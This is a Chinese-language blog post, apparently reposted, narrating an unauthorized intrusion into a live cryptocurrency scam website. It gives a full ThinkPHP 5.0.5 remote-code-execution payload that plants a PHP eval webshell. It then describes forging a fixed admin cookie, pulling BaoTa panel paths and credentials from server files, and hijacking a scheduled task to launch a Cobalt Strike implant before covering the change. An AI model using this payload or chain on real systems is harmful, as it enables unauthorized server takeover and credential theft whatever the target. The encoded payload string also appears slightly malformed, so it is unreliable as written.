最近偶然發(fā)現(xiàn)一個(gè)虛擬貨幣買漲跌的殺豬盤，遂進(jìn)行了一波測(cè)試，前臺(tái)長(zhǎng)這樣。

為thinkphp5.0.5隨用RCE進(jìn)行打入，成功寫入webshell。

s=index|think\app/invokefunction &function=call_user_func_array&vars[0]=assert &vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MMTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

查看發(fā)現(xiàn)phpinfo信息發(fā)現(xiàn)已經(jīng)禁用所有能夠執(zhí)行系統(tǒng)命令的函數(shù)，且com和dl加載都不能用無(wú)法執(zhí)行相應(yīng)的系統(tǒng)命令如下所示:

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open

//php如上系統(tǒng)命令都已經(jīng)禁用

但有文件的讀寫權(quán)限沒(méi)有禁用assert(),file_put_contents()等函數(shù)，查看后發(fā)現(xiàn)windows系統(tǒng)如下所示:

由于php執(zhí)行系統(tǒng)命令的函數(shù)都被禁用勒，從而導(dǎo)致無(wú)法執(zhí)行系統(tǒng)命令很難受，之后下載了他的網(wǎng)站源碼簡(jiǎn)單看了一波，發(fā)現(xiàn)其管理員cookie固定且可以偽造如下所示，看著像后門:

故可后臺(tái)登錄繞過(guò)，管理員cookie固定，添加cookie字段即可登錄繞過(guò)。瀏覽器f12,在cookie中添加上述鍵值訪問(wèn)index，即可成功后臺(tái)登錄如下所示好多錢(被騙的人好多):

前臺(tái)詢問(wèn)客服了解到轉(zhuǎn)賬賬戶(該殺豬盤運(yùn)作方式是用戶將錢打入客服提供的賬戶后，用戶再在自己的賬號(hào)沖入相應(yīng)數(shù)值的資金至后臺(tái)審核，審核后即可使用數(shù)值的前進(jìn)行貨幣的漲跌投資買賣交易),留作證據(jù)上交:

由于之前一直無(wú)法執(zhí)行系統(tǒng)命令，想要突破一下就開(kāi)始翻他服務(wù)器上的文件，翻閱文件發(fā)現(xiàn)存在寶塔的文件夾，探測(cè)發(fā)現(xiàn)確實(shí)開(kāi)放8888端口存在寶塔服務(wù)但默認(rèn)登錄入口已被修改，如下所示:

翻閱寶塔文件發(fā)現(xiàn)存儲(chǔ)路徑的文件名admin_path.pl,如下所示:

找到寶塔登錄入口，成功訪問(wèn)該登錄入口，如下所示:

繼續(xù)翻閱發(fā)現(xiàn)一個(gè)default.pl的文件，該文件中存放的是相應(yīng)的登錄密碼:

拿到密碼嘗試了默認(rèn)用戶名發(fā)現(xiàn)不對(duì)不能登錄，繼續(xù)翻文件default.db文件是記錄登錄記錄的，找到登錄賬號(hào):

利用賬號(hào)密碼成功登錄寶塔管理后臺(tái)，如下所示：利用賬號(hào)密碼成功登錄寶塔管理后臺(tái)，如下所示：

找到定時(shí)任務(wù)處修改計(jì)劃任務(wù)執(zhí)行cs上線馬，上線后在將計(jì)劃任務(wù)改回，如下所示：

cs成功上線如下所示:

查看ip僅有公網(wǎng)地址無(wú)內(nèi)網(wǎng)，同C段還有其他幾臺(tái)部署的都是同一套東西就不再往下搞了:

總的就這樣，沒(méi)啥東西比較無(wú)味。

總結(jié)

以上是生活随笔為你收集整理的干货|对某杀猪盘的渗透测试的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。